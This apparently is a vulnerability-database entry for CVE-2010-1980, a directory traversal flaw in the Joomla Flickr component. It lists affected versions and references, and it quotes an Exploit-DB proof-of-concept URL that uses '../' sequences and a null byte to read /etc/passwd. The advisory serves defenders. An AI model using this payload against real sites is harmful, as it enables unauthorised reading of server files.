CVE-2010-1980
Description
Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
==================================================================================================================
[o] Joomla Component Joomla Flickr Local File Inclusion Vulnerability
Software : com_joomlaflickr version 1.0.x
Vendor : http://aloiroberto.wordpress.com/software/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/
==================================================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_joomlaflickr&controller=[LFI]
[o] PoC
http://localhost/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
==================================================================================================================
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
==================================================================================================================
[o] April 06 2010 - GMT +07:00 Jakarta, Indonesia
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| roberto_aloi | com_joomlaflickr | 1.0.3 | |
| joomla | joomla\! | | |
References
- http://bitbucket.org/roberto.aloi/joomla-flickr/changeset/64ebf6b25030
- http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt
- http://secunia.com/advisories/39358
- http://www.exploit-db.com/exploits/12085
- http://www.securityfocus.com/bid/39251
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57573
- http://bitbucket.org/roberto.aloi/joomla-flickr/changeset/64ebf6b25030
- http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt
- http://secunia.com/advisories/39358
- http://www.exploit-db.com/exploits/12085
- http://www.securityfocus.com/bid/39251
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57573
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.